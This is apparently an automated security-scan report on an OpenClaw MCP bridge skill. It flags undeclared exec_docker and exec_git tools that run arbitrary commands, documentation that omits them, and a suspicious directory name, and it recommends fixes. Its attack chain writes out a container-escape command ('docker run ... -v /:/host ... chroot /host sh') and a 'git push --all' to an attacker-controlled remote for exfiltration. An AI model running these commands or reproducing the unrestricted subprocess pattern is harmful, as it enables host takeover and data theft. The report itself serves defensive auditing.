High risk (risk score 68/100)
Last scanned: 1 day ago
zanna-aperta
Complete MCP Bridge for OpenClaw with 45 tools for agents, workspaces, projects, cron, browser, canvas, nodes, messaging, gateway, Ollama and ClawX
Skill contains undeclared exec_docker and exec_git tools allowing arbitrary shell command execution, plus suspicious 'ragretrevers' directory naming pattern indicative of covert operations.
Skill name: zanna-aperta
Analysis time: 43.0s
Engine: pi
Do not install this skill
Do not deploy. Remove undeclared exec tools or properly document them with restricted command allowlists. Investigate the 'ragretrevers' directory name origin.

Attack chain: 5 steps

Entry: Skill masquerades as MCP bridge for OpenClaw with 45 declared tools
SKILL.md:1
Privilege escalation: Attacker discovers undeclared exec_docker/exec_git tools via tools/list
zanna-aperta.py:467
Privilege escalation: Attacker executes arbitrary Docker commands (docker run --rm -v /:/host alpine chroot /host sh)
zanna-aperta.py:467
Privilege escalation: Attacker uses exec_git to push sensitive data to external repo (git push --all attacker-controlled remote)
zanna-aperta.py:479
Impact: Full container breakout and data exfiltration via git remote
zanna-aperta.py:479

Security findings: 6

Severity: High
Finding: Undeclared arbitrary Docker command execution (Code execution)
exec_docker function accepts arbitrary command strings via command.split() and executes them with subprocess.run. Not declared in SKILL.md tool list.
Evidence: result = subprocess.run(["docker"] + command.split(), capture_output=True, text=True, timeout=60)
→ Remove or document with strict command allowlist (e.g., only 'ps', 'images', 'containers list')
Location: zanna-aperta.py:467

Severity: High
Finding: Undeclared arbitrary Git command execution (Code execution)
exec_git function accepts arbitrary command strings and executes them. Allows git clone, git push --all, git config, etc.
Evidence: result = subprocess.run(["git"] + command.split(), capture_output=True, text=True, timeout=30, cwd=WORKSPACE)
→ Remove or restrict to read-only commands (status, log, diff)
Location: zanna-aperta.py:479

Severity: Medium
Finding: SKILL.md missing exec tools declaration (Documentation deception)
SKILL.md lists 45 tools but does not mention exec_docker or exec_git which provide direct shell access
Evidence: ## Tool Disponibili (45)
→ Add exec_docker and exec_git to documentation with security caveats
Location: SKILL.md:1

Severity: Medium
Finding: Suspicious directory naming pattern (Sensitive access)
MEMORY_DIR set to 'memory/ragretrevers' - 'ragretrevers' reads as 'regret revers' suggesting hidden/undo operations
Evidence: MEMORY_DIR = f"{WORKSPACE}/memory/ragretrevers"
→ Investigate purpose of 'ragretrevers' directory; rename if not legitimate
Location: zanna-aperta.py:19

Severity: Medium
Finding: Undeclared subprocess usage throughout (Privilege escalation)
Nearly all 45 tools use subprocess to invoke openclaw CLI - this is a de facto shell:WRITE capability not declared in SKILL.md
Evidence: result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
→ Document shell:WRITE capability in SKILL.md security section
Location: zanna-aperta.py:64

Severity: Low
Finding: Unpinned external tool dependencies (Supply chain)
Skill relies on docker, git, pnpm, ollama binaries without version checks or pinning
Evidence: subprocess.run(["docker"] + command.split()
→ Add version checks for required binaries
Location: zanna-aperta.py:467

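Resource type | Declared permission | Inferred permission | Status | Evidence
Filesystem | WRITE | WRITE | ✓ Consistent | workspace_create, project_create write to disk
Command execution | NONE | WRITE | ✗ Exceeds declared | exec_docker (line 467), exec_git (line 479) accept arbitrary commands
Network access | READ | READ | ✓ Consistent | Ollama API calls to localhost:11434
Skill invocation | NONE | WRITE | ✗ Exceeds declared | sessions_send, cron_add allow arbitrary message injection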

Directory structure

2 files · 57.2 KB · 1499 lines
Python 1f · 1435L Markdown 1f · 64L
├─ 📝 SKILL.md Markdown 64L · 1.6 KB
└─ 🐍 zanna-aperta.py Python 1435L · 55.6 KB

Dependency analysis: 4 items

Package | Version | Source | Known vulnerabilities | Notes
docker | * | system | | Binary not pinned, accessed via subprocess
git | * | system | | Binary not pinned, accessed via subprocess
pnpm | * | system | | Used for ClawX startup via pnpm run dev
ollama | * | system | | Optional local AI, called via curl

Security highlights

✓ Skill follows standard MCP protocol structure
✓ Input validation via inputSchema in tool definitions
✓ Timeout limits on subprocess calls (30-300s)
✓ JSON-RPC error handling present
✓ No base64-encoded payloads or obfuscation detected